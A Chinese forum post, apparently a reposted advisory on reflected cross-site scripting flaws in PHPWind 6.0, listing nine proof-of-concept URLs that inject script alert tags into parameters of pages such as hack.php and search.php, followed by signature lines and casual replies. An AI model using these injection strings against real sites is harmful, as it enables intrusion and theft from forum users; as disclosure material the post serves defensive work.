PHPWind 6.0多个跨站脚本漏洞

PHPWind是一款国内比较流行的基于PHP的Web论坛程序。

PHPWind在访客注销时没有正确的过滤提交给hack.php、search.php、read.php、post.php、thread.php、 profile.php、sort.php、message.php、userpay.php等页面的请求参数，远程攻击者可以提交恶意请求执行跨站脚本攻击。
测试代码：
http://www.hackqing.cn/hack.php?H_name=bank"><script>alert(/qing/);</script>
http://www.hackqing.cn/search.php?asc=desc"><script>alert(/qing/);</script>
http://www.hackqing.cn/read.php?nowtime="><script>alert(/qing/);</script>
http://www.hackqing.cn/post.php?fid=10"><script>alert(/qing/);</script>
http://www.hackqing.cn/profile.php?action=forumright"><script>alert(/qing/);</script>
http://www.hackqing.cn/thread.php?skinco=black"><script>alert(/qing/);</script>
http://www.hackqing.cn/message.php?action=scout"><script>alert(/qing/);</script>
http://www.hackqing.cn/sort.php?skinco=black"><script>alert(/qing/);</script>
http://www.hackqing.cn/userpay.php?skinco=black"><script>alert(/qing/);</script>
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.phpwind.net

<Script>alert("XSS it then Hack it!") </Script>

<Script>alert("Check it then Hack it! Debug it then Crack it! ") </Script>


你的签名很有趣啊

alert("Check it then Hack it! Debug it then Crack it! ")


你的签名很有趣啊
mirk 发表于 2010-4-2 01:04

mirk 发表于 2010-4-2 01:04

    必须的啊！~呵呵！~玩的就是个性！嘿嘿！~